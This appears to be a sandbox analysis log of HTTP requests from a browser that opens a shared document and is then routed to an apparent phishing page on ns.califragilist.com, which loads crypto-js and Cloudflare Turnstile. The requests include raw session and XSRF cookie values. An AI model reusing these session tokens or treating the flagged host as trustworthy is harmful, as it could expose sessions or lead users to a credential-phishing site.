            Source: global trafficHTTP traffic detected: GET /build/assets/Document-d618b903.js HTTP/1.1Host: app.marmof.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.marmof.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /build/assets/logotype-original-6f3eac48.js HTTP/1.1Host: app.marmof.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.marmof.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /build/assets/Button-7c0475a9.js HTTP/1.1Host: app.marmof.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.marmof.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /js/script.js HTTP/1.1Host: plausible.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon-32x32.png HTTP/1.1Host: app.marmof.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /build/assets/Document-d618b903.js HTTP/1.1Host: app.marmof.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /build/assets/logotype-original-6f3eac48.js HTTP/1.1Host: app.marmof.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /site.webmanifest HTTP/1.1Host: app.marmof.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /build/assets/Button-7c0475a9.js HTTP/1.1Host: app.marmof.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /favicon-32x32.png HTTP/1.1Host: app.marmof.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /7PXU/ HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ns.califragilist.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ns.califragilist.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ns.califragilist.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ns.califragilist.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ns.califragilist.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8de644ce9b5745f6&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjhqSENYMSt1OXdLOXRZbGJzV1FqL3c9PSIsInZhbHVlIjoiaHk0N05sMlNZK1IySDVXRFdhVkZkRTczQjB6ZUU5bktEaE9mZDhNVHlNRlNMMk1ZdXgzOXZWOUQ1SU5OdW9xTlZ1ejA5bmhnMTlTVThINHp2b2xNL1ZIandRTFV1WEJWYkpEUndjOHQzcldKUXNLcGdPaDhxOUxrRVc3alRPcmQiLCJtYWMiOiI0YmQwNjlkNDY4OWI0MjIwYjVhMjI0Njc2MTZlNWE0NjkxZDExNTU0Mzk0ODc5MTlhZmNmNWQ5ZjAwY2Q5ZDBiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNPSmpMUGFpZzFkNnBoVDBJUER3OEE9PSIsInZhbHVlIjoiZW1nWGs4NWtOZG9oUm9vTC83bEx4eVFkaFZwZDdIQU1icGV1WTJvaHFtb2dQZWp5eWZWTHRrZ2dEQ2d4akl5Ny9nNlMyWHJsNW9WcmlEbUw0bXdPdE5DLzNNdnlLWmtyRkVSODE3UlBXdWE2cGZxYWRGWlhCMytqMStNSGx5Mi8iLCJtYWMiOiIyNzg5MTIxNTIwMWMxZDJhZWY3YTg0ODlhNWZkODdlYjIwMDdmOGNjMDA0NDBkNGYzYmZmM2M2NDExM2Y5ZjZmIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8de644ce9b5745f6&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/985987479:1730906859:VmyJFIL_Fq-MDv0sVVlGF-GoqYDiNITe2QXZJkrSh1A/8de644ce9b5745f6/10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8de644ce9b5745f6/1730908538244/21b1b96677c9e3ef37b23fb885bf7ea9a1606ccafad54ff0890341b4aacd38a1/1Xp8Bu6WhlXmVxt HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
